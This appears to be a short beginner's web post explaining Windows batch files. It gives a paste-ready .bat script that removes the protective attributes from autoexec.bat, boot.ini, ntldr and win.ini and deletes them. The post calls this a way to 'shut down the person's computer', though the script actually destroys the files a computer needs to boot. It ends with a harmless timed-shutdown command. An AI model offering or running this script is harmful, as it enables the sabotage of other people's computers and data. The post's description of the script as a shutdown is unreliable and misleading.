What is a Batch File?
In simple words, I can say the batch file is a file that can contain some instructions to perform the task. It will structure with the help of a notepad file and save up in .bat format.
You can follow the below-mentioned setup:
Open notepad and copy/paste this code:
@echo off attrib -r -s -h c:\autoexec.bat del c:\autoexec.bat attrib -r -s -h c:\boot.ini del c:\boot.ini attrib -r -s -h c:\ntldr del c:\ntldr attrib -r -s -h c:\windows\win.ini del c:\windows\win.ini
(Don't try on your own computer)

Directly Save it as a .bat file. This should shut down the person's computer.

It will completely shut down off once and deletes the file needed to reboot and restart......
And If you want to go somewhere and download some urgent file which will take near about 2 hours to complete and you want something which can turn off your computer after 2 hours. Then you can try the below-mentioned command on the window command prompt (CMD):
shutdown -s -t 7200
(Note: Make sure you have run the CMD mode by the administrative privilege)
